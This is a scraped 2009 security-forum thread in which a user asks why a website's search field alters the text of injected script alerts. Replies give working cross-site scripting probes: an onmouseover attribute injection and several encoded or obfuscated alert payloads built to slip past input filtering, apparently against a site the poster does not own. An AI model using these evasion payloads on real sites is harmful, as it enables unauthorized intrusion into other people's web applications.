Help! Website with XSS bug changes my input Hello guys, There is a website with a search field at the index page. When i enter <script>alert("test");</script> in the search field there comes a pop-up which says: "best" instead of "test". When I enter <script>alert("test123");</script> the website says: "test" instead of "test123" What does this mean? isn't this website vulnerable to XSS or something? http://sla.ckers.org/forum/read.php?2,31708,31708#msg-31708 Tue, 18 Jun 2013 22:54:43 -0500 Phorum 5.2.15a http://sla.ckers.org/forum/read.php?2,31708,32262#msg-32262 Re: Help! Website with XSS bug changes my input http://sla.ckers.org/forum/read.php?2,31708,32262#msg-32262 PaPPy XSS Info Wed, 11 Nov 2009 06:14:21 -0600 http://sla.ckers.org/forum/read.php?2,31708,32257#msg-32257 Re: Help! Website with XSS bug changes my input http://sla.ckers.org/forum/read.php?2,31708,32257#msg-32257
http://sla.ckers.org/forum/read.php?2,31936


please remove MySite link
thank you]]> mjmjmj XSS Info Tue, 10 Nov 2009 21:28:42 -0600 http://sla.ckers.org/forum/read.php?2,31708,32230#msg-32230 Re: Help! Website with XSS bug changes my input http://sla.ckers.org/forum/read.php?2,31708,32230#msg-32230 hxxps://victim/?UserN=" onmouseover="alert(1)" style="display:block; width:500px; height:500px;


works in firefox]]> PaPPy XSS Info Mon, 09 Nov 2009 16:16:07 -0600 http://sla.ckers.org/forum/read.php?2,31708,31749#msg-31749 Re: Help! Website with XSS bug changes my input http://sla.ckers.org/forum/read.php?2,31708,31749#msg-31749 replace XX with tt]]> PaPPy XSS Info Tue, 06 Oct 2009 15:14:17 -0500 http://sla.ckers.org/forum/read.php?2,31708,31748#msg-31748 Re: Help! Website with XSS bug changes my input http://sla.ckers.org/forum/read.php?2,31708,31748#msg-31748 Hanna313 XSS Info Tue, 06 Oct 2009 15:09:08 -0500 http://sla.ckers.org/forum/read.php?2,31708,31747#msg-31747 Re: Help! Website with XSS bug changes my input http://sla.ckers.org/forum/read.php?2,31708,31747#msg-31747 PaPPy XSS Info Tue, 06 Oct 2009 15:00:02 -0500 http://sla.ckers.org/forum/read.php?2,31708,31746#msg-31746 Re: Help! Website with XSS bug changes my input http://sla.ckers.org/forum/read.php?2,31708,31746#msg-31746
I tried Extraneous open brackets: <<SCRIPT>alert('test');//<</SCRIPT>

and this one first shows one pop-up saying: "best" and the next one saying "test".

So i am improving but how can I optimize this query, so I only get one -pop-up saying: "test"]]> Hanna313 XSS Info Tue, 06 Oct 2009 14:58:02 -0500 http://sla.ckers.org/forum/read.php?2,31708,31738#msg-31738 Re: Help! Website with XSS bug changes my input http://sla.ckers.org/forum/read.php?2,31708,31738#msg-31738
<script>alert(String.fromCharCode(116,101,115,116));</script>
<script>alert("\x74\x65\x73\x74");</script>
<script>alert("\u0074\u0065\u0073\u0074");</script>
<script>alert("\164\145\163\164");</script>
<script>alert("&#65364;&#65349;&#65363;&#65364;");</script><!-- slackers needs UTF-8 this won't display correctly :P -->
<script>alert("test");</script>
<script>_=-~-~[],$=-~_,____=_<<_,__=____+~[];________=($-$)[________________=(''+{})[_+$]+(''+{})[$-_]+([].$+'')[$-_]+(!!''+'')[$]+({}+'')[$+$]+(!''+'')[$-_]+(!''+'')[_]+(''+{})[_+$]+({}+'')[$+$]+(''+{})[$-_]+(!''+'')[$-_]][________________];alert(________(________((!''+'')[$-_]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[_]+((!''+''))[$-_]+([].$+'')[$-_]+'\''+''+'\\'+($-_)+($+$)+(_)+'\\'+($-_)+(_+_)+(_+$)+'\\'+($-_)+($+$)+(_+_)+'\\'+($-_)+($+$)+(_+$)+'\\'+($-_)+($+$)+(_)+'\\'+($-_)+(_+$)+($+$)+'\\'+(_+_)+($-$)+'\\'+(_+_)+(_)+'\\'+($-_)+($+$)+(_+_)+'\\'+($-_)+(_+_)+(_+$)+'\\'+($-_)+($+$)+($)+'\\'+($-_)+($+$)+(_+_)+'\\'+(_+_)+(_)+'\'')())())</script>]]> Gareth Heyes XSS Info Tue, 06 Oct 2009 10:05:13 -0500 http://sla.ckers.org/forum/read.php?2,31708,31736#msg-31736 Re: Help! Website with XSS bug changes my input http://sla.ckers.org/forum/read.php?2,31708,31736#msg-31736 PaPPy XSS Info Tue, 06 Oct 2009 07:20:45 -0500 http://sla.ckers.org/forum/read.php?2,31708,31734#msg-31734 Re: Help! Website with XSS bug changes my input http://sla.ckers.org/forum/read.php?2,31708,31734#msg-31734
when I enter: <script>alert("test");</script> in the searchfield a pop-up shows up saying "best".

What happens is that for some reason the pop-up contains the alternative searchword.

Another example: when I search for: <script>alert("doggy");</script> the pop-up shows up saying "dog", because it took the alternative searchword.

What can I do to prevent this and make the pop-up say what I enter as input?]]> Hanna313 XSS Info Tue, 06 Oct 2009 05:20:36 -0500 http://sla.ckers.org/forum/read.php?2,31708,31708#msg-31708 Help! Website with XSS bug changes my input http://sla.ckers.org/forum/read.php?2,31708,31708#msg-31708
There is a website with a search field at the index page.

When i enter <script>alert("test");</script> in the search field there comes a pop-up which says: "best" instead of "test".


When I enter <script>alert("test123");</script> the website says: "test" instead of "test123"

What does this mean? isn't this website vulnerable to XSS or something?]]> Hanna313 XSS Info Fri, 02 Oct 2009 17:42:38 -0500